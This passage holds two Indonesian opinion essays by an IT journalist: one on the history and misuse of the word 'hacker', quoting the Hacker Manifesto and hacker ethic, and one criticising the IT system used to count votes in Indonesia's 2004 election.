Kemudian belum lama berselang, tepatnya pada tanggal 16 Agustus 2001, beberapa perusahaan dotcom menyelenggarakan sebuah acara bertajuk HackersNight, di sebuah café di bilangan Jakarta Selatan. Acara HackersNight tersebut merupakan acara bulanan yang sudah mencapai putaran ke 12 di Jakarta. Acara party-party ala pebisnis dotcom tersebut juga dilangsungkan di Bandung dan Surabaya, dan sudah tentu dilaksanakan di sebuah café pula. Acara yang dilangsungkan hingga larut malam tersebut banyak menyajikan aneka hiburan, musik yang keras dan setumpuk hadiah dari para sponsor.
Bagi orang awam, kedua informasi tersebut tidaklah menunjukkan kejanggalan apapun. Toh memang akhirnya terminologi hacker bagi orang awam tidak mempunyai banyak arti dan tidak berpengaruh banyak dalam kehidupan sehari-hari mereka. Tetapi bagi pelaku dan pemain industri teknologi informasi (TI), atau setidaknya bagi pemerhati dan pecinta TI, penggunaan kata hacker untuk dua contoh kasus tersebut di atas bisa menjadi suatu diskusi yang panjang. Ada pertanyaan yang paling mendasar: “Sudah tepatkah penggunaan kata hacker tersebut?” Untuk menjawab pertanyaan tersebut, ada baiknya kita memahami terminologi hacker tersebut lebih jauh.
==================================
Sejarah Singkat Terminologi Hacker
==================================
Terminologi hacker muncul pada awal tahun 1960-an diantara para anggota organisasi mahasiswa Tech Model Railroad Club di Laboratorium Kecerdasan Artifisial Massachusetts Institute of Technology (MIT). Kelompok mahasiswa tersebut merupakan salah satu perintis perkembangan teknologi komputer dan mereka berkutat dengan sejumlah komputer mainframe. Kata hacker pertama kalinya muncul dengan arti positif untuk menyebut seorang anggota yang memiliki keahlian dalam bidang komputer dan mampu membuat program komputer yang lebih baik ketimbang yang telah dirancang bersama.
Kemudian pada tahun 1983, analogi hacker semakin berkembang untuk menyebut seseorang yang memiliki obsesi untuk memahami dan menguasai sistem komputer. Pasalnya, pada tahun tersebut untuk pertama kalinya FBI menangkap kelompok kriminal komputer The 414s yang berbasis di Milwaukee AS. 414 merupakan kode area lokal mereka. Kelompok yang kemudian disebut hacker tersebut dinyatakan bersalah atas pembobolan 60 buah komputer, dari komputer milik Pusat Kanker Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos.
1 dari pelaku tersebut mendapatkan kekebalan karena testimonialnya, sedangkan 5 pelaku lainnya mendapatkan hukuman masa percobaan. Pada tahun yang sama keluar pula sebuah film berjudul War Games yang salah satu perannya dimainkan oleh Matthew Broderick sebagai David Lightman. Film tersebut menceritakan seorang remaja penggemar komputer yang secara tidak sengaja terkoneksi dengan super komputer rahasia yang mengkontrol persenjataan nuklir AS.
Kemudian pada tahun 1995 keluarlah film berjudul Hackers, yang menceritakan pertarungan antara anak muda jago komputer bawah tanah dengan sebuah perusahaan high-tech dalam menerobos sebuah sistem komputer. Dalam film tersebut digambarkan bagaimana akhirnya anak-anak muda tersebut mampu menembus dan melumpuhkan keamanan sistem komputer perusahaan tersebut. Salah satu pemainnya adalah Angelina Jolie berperan sebagai Kate Libby alias Acid Burn.
Pada tahun yang sama keluar pula film berjudul The Net yang dimainkan oleh Sandra Bullock sebagai Angela Bennet. Film tersebut mengisahkan bagaimana perjuangan seorang pakar komputer wanita yang identitas dan informasi jati dirinya di dunia nyata telah diubah oleh seseorang. Dengan keluarnya dua film tersebut, maka eksistensi terminologi hacker semakin jauh dari yang pertama kali muncul di tahun 1960-an di MIT.
==============================
Manifesto dan Kode Etik Hacker
==============================
Sebenarnya hacker memiliki manifesto dan kode etik yang menjadi patokan bagi hacker di seluruh dunia. Manifesto Hacker dibuat oleh seorang hacker yang menggunakan nickname The Mentor dan pertama kali dimuat pada majalah Phrack (volume 1 / issue 7 / 25 September 1986).
Manifesto Hacker tersebut adalah:
- Ini adalah dunia kami sekarang, dunianya elektron dan switch, keindahan sebuah baud.
- Kami mendayagunakan sebuah sistem yang telah ada tanpa membayar, yang bisa jadi biaya tersebut sangatlah murah jika tidak dijalankan dengan nafsu tamak mencari keuntungan, dan kalian sebut kami kriminal.
- Kami menjelajah, dan kalian sebut kami kriminal.
- Kami mengejar pengetahuan, dan kalian sebut kami kriminal.
- Kami hadir tanpa perbedaan warna kulit, kebangsaan, ataupun prasangka keagamaan, dan kalian sebut kami kriminal.
- Kalian membuat bom atom, kalian menggelar peperangan, kalian membunuh, berlaku curang, membohongi kami dan mencoba meyakinkan kami bahwa semua itu demi kebaikan kami, tetap saja kami yang disebut kriminal.
- Ya, aku memang seorang kriminal.
- Kejahatanku adalah rasa keingintahuanku.
- Kejahatanku adalah karena menilai orang lain dari apa yang mereka katakan dan pikirkan, bukan pada penampilan mereka.
- Kejahatanku adalah menjadi lebih pintar dari kalian, sesuatu yang tak kan kalian maafkan.
- Aku memang seorang hacker, dan inilah manifesto saya.
- Kalian bisa saja menghentikanku, tetapi kalian tak mungkin menghentikan kami semua.
- Bagaimanapun juga, kami semua senasib seperjuangan.
Hacker juga memiliki kode etik yang pada mulanya diformulasikan dalam buku karya Steven Levy berjudul Hackers: Heroes of The Computer Revolution, pada tahun 1984.
Kode etik hacker tersebut tertulis:
1. Akses ke sebuah sistem komputer, dan apapun saja dapat mengajarkan mengenai bagaimana dunia bekerja, haruslah tidak terbatas sama sekali
2. Segala informasi haruslah gratis
3. Jangan percaya pada otoritas, promosikanlah desentralisasi
4. Hacker haruslah dinilai dari sudut pandang aktifitas hackingnya, bukan berdasarkan standar organisasi formal atau kriteria yang tidak relevan seperti derajat, usia, suku maupun posisi.
5. Seseorang dapat menciptakan karya seni dan keindahan di komputer
6. Komputer dapat mengubah kehidupan seseorang menjadi lebih baik.
==================
Hacker dan Cracker
==================
Sebenarnya secara lebih spesifik terminologi hacker telah dijelaskan dalam buku Hacker Attack karya Richard Mansfield tahun 2000. Menurut Mansfield, hacker didefinisikan sebagai seseorang yang memiliki keinginan untuk melakukan eksplorasi dan penetrasi terhadap sebuah sistem operasi dan kode komputer pengaman lainnya, tetapi tidak melakukan tindakan pengrusakan apapun, tidak mencuri uang atau informasi. Sedangkan cracker adalah sisi gelap dari hacker dan memiliki kertertarikan untuk mencuri informasi, melakukan berbagai macam kerusakan dan sesekali waktu juga melumpuhkan keseluruhan sistem komputer.
Perbedaan terminologi antar hacker dan cracker tersebut kini menjadi bias dan cenderung hilang sama sekali dalam perspektif media massa dan di masyarakat umum. Ada beberapa faktor penyebab hal tersebut:
- Para cracker tidak jarang menyebut diri mereka sebagai hacker
- Manifesto dan kode etik para hacker kerap pula dianggap sebagai manifesto dan kode etik bagi para cracker.
- Media massa menggunakan terminologi hacker secara salah kaprah dan hantam kromo
- Industri film mengangkat kehidupan hacker dari kacamata Hollywood
- Masyarakat melabelisasi kegiatannya menggunakan kata hacker agar lebih memiliki daya jual
Berdasarkan beberapa kondisi tersebut di atas, maka terminologi hacker memiliki pelebaran makna sedemikian rupa, sehingga kesalah-kaprahan kian hari kian menjadi-jadi. Setiap perilaku negatif yang dilakukan di Internet sering kali dikaitkan dengan istilah hacker, baik oleh media massa maupun masyarakat umum. Contohnya adalah pada paragraf pertama dan kedua tulisan ini. Perilaku men-defaced suatu situs nyata-nyata bukanlah modus operandi hacker. Hacker sejatinya tidak memiliki niatan atau tindakan yang sifatnya merusak.
Penggunaan kata hacker untuk sebuah acara party-party di café seperti contoh di atas juga merupakan satu bentuk pengaburan makna hacker yang sebenarnya. Acara HackersNight yang selalu digelar di café-café tersebut hanyalah merupakan ajang kumpul-kumpul pebisnis dotcom untuk bertukar kartu nama, menikmati hiburan dan bercengkerama hingga larut malam. Agak sulit jika ingin memperkirakan bahwa hacker yang sebenarnya akan menghadiri acara tersebut. Karena sejatinya seorang hacker kurang mau jati dirinya terekspos.
Berbeda bila kita berbicara mengenai ajang pertemuan hacker terbesar di dunia, Def Con, yang diadakan setahun sekali setiap pertengahan bulan Juli di Las Vegas. Acara Def Con tersebut lebih kepada ajang pertukaran informasi dan teknologi yang berkaitan dengan aktifitas hacking. Para hacker dari seluruh dunia tidak segan-segan untuk muncul setahun sekali dalam Def Con tersebut karena disitulah mereka dapat merasakan berada di komunitas hacker yang sesungguhnya, bukan sekedar labelisasi saja.
Walhasil, melihat beberapa kondisi di atas, akhirnya mau tidak mau terjadi kompromi dalam penggunaan istilah hacker. Sebagian orang ada memilih istilah hacker dan cracker, ada yang lebih nyaman menggunakan istilah hacker putih dan hacker hitam dan ada pula yang tetap menggunakan kata hacker untuk semua perilaku kriminalitas di Internet. Karena hacker yang sejati lebih banyak diam, cracker sering menyatakan dirinya sebagai hacker dan masyarakat umum lebih familiar dengan istilah hacker, akhirnya mau tidak mau media massa harus mengikuti selera pasar dengan ikut-ikutan mengeneralisir terminologi hacker.
*) Penulis adalah Koordinator ICT Watch dan jurnalis TI independen. Dapat dihubungi melalui e-mail donnybu@ictwatch.com. Tulisan ini pernah dimuat oleh majalah Neotek, Vol.II - No. 1, Oktober 2001. Tulisan ini bebas dikutip asal menyebutkan sumbernya.
—————————–
Biar Miskin Asal Sombong
oleh : Donny B.U. *
Saya sebenarnya sempat optimis bahwa komputer dan Internet, bisa menggantikan fungsi beberapa teknologi komunikasi lawas yang sudah kadung dikeloni oleh sekian ratus juta penduduk Indonesia. Toh memang di beberapa kondisi, hal tersebut sudah mulai terasa, walaupun masih malu-malu. Misalnya saja, ketika dulu yang namanya berkirim-kiriman pesan untuk menyatakan turut berbahagia ataupun turut berduka cita kerap disampaikan dalam bentuk tertulis di atas sebuah kertas yang dibungkus oleh amplop berperangko, kini banyak yang mengalihkannya ke jasa layanan pesan singkat (SMS) dengan biaya kurang dari gopek. Murah meriah, cepat tepat! Komunikasi antar benua pun sudah tidak perlu menunggu berhari-hari, cukup sampaikan melalui e-mail, maka detik itupun komunikasi sudah terjalin. Mau yang interaktif? Bisa gunakan fasilitas chatting, asal betah saja memahami maksud lawan bicara dengan cara membaca tulisan di monitor dan menjawabnya dengan cara mengetik.
Mau yang lebih revolusioner? Lengkapi saja perangkat komputer Anda dengan sound card, speaker dan microphone ala kadarnya. Modalnya paling banter di bawah gopekceng. Lalu instal software komunikasi berbasis Voice over Internet Protocol (VoIP), semisal Yahoo! Messenger, maka Anda sudah bisa bercuap-cuap dengan lawan bicara yang berada di mana saja di penjuru dunia. Syaratnya cuma akses Internet dan pulsa telepon lokal! Hebat bukan? Semangat komputerisasi dan Internetisasi ini yang selalu didengung-dengungkan oleh para pandai Internet kepada masyarakat awam. Pokoknya, apapun aktifitas Anda, hasilnya akan lebih murah-meriah cepat-tepat apabila menggunakan komputer dan Internet, alias teknologi informasi (TI)
Lah kok pada saat ajang unjuk diri TI terakbar di Indonesia pada awal April 2004 lalu, tepatnya saat proses penghitungan suara Pemilu 2004, hasilnya kok bertolak belakang dengan apa yang “ditempelkan” di jidat masyarakat tentang TI? Sistem komputerisasi Pemilu yang sedemikian canggihnya, dan tentunya sedemikian mahalnya, ternyata dirasakan melempem oleh masyarakat. Banyak anomali yang timbul, misalnya lambatnya pemrosesan data suara untuk dapat ditampilkan di pusat tabulasi nasional, berubahnya angka menjadi 0 semua atau terjadi lonjakan angka sekian puluh juta, hingga terubahnya nama partai di dalam sistem TI tersebut menjadi nama yang “aneh-tapi-nyata” lantaran sistem berharga ratusan miliar rupiah tersebut sempat disatroni oleh “orang iseng” yang juga menggunakan komputer dan Internet. Pihak KPU boleh mengeluarkan sejuta alasan teknis untuk pembelaan diri, toh masyarakat sudah kadung kecewa. Lagian apa kepentingannya masyarakat umum dengan alasan teknis?
Toh bagi mereka, yang penting hasilnya sesuai tidak dengan yang dijanjikan dan dengan biaya yang telah dikeluarkan. Masak iya, kecepatan hasil penghitungan suara secara komputer bisa setara dengan yang secara manual. Itu saja kok yang ada di benak masyarakat! Apalagi konon, seperti kerap menjadi bisik-bisik di masyarakat, sebuah lagu yang dipopulerkan oleh Elvis Presley, yaitu “Love Me Tender”, sangat populer di KPU. Mudah-mudahan kecewanya masyarakat lebih kepada manajemen KPU-nya, bukan kepada TI-nya.
Tapi tidak perlu terlalu heran. Nyatanya memang bangsa kita ini masih agak gamang, kagetan dan “gumunan” dengan perkembangan TI yang revolusioner di Indonesia. Memang, ada indikasi bahwa TI kita ini ujung-ujungnya adalah “menurut petunjuk” vendor saja. Bisa jadi mereka memang sebenarnya tidak peduli kita siap atau tidak, butuh atau tidak. Yang penting jualan mereka laku di negara dunia kedua dan ketiga, karena pasar di negara asal mereka sudah jenuh! Kan ada prinsip dasar marketing, yaitu ciptakan kebutuhan, apabila memang barang jualan kita sebenarnya belum menjadi kebutuhan yang mendesak di pasar. Makanya jangan heran, bila ada rekan Anda, atau mungkin Anda sendiri, yang punya ponsel lebih dari 1 buah. Padahal mulut kita hanya satu! Atau mungkin ada yang memiliki ponsel, notebook atau komputer tercanggih, tetapi optimalisasi fungsinya paling banter hanya 10% saja. Pokoknya canggih, pokoknya menjadi trend-setter, pokoknya up-to-date, dan pokoknya mahal!
Jadi, akhirnya memang KPU tidak terlalu salah jika sistem TI yang mereka bangun tersebut kurang dapat berfungsi secara optimal. Lah wong gamang, kagetan dan “gumunan” terhadap TI ini sudah menjadi penyakit bangsa kok! Toh kebetulan saja, KPU ini menjadi bola kristal untuk melihat kondisi yang ada. Jadi, mempertanyakan kebijakan KPU dengan komputerisasinya tersebut sama dengan mempertanyakan diri sendiri di depan cermin. Logikanya, menghujat KPU ya menghujat diri sendiri toh! Kan sudah menjadi kelaziman di masyarakat kita (dan di negara kita tentunya), bahwa kemampuan yang terbatas kerap kalah set dengan ego yang menggelora. Ibarat pepatah ala “warung kopi”, nafsu besar tenaga kurang, biar miskin asal sombong!
*) Penulis adalah Koordinator ICT Watch dan jurnalis TI independen. Dapat dihubungi melalui e-mail donnybu@ictwatch.com. Tulisan ini pernah dimuat oleh majalah Djakarta!, Juni 2004. Tulisan ini bebas dikutip asal menyebutkan sumbernya.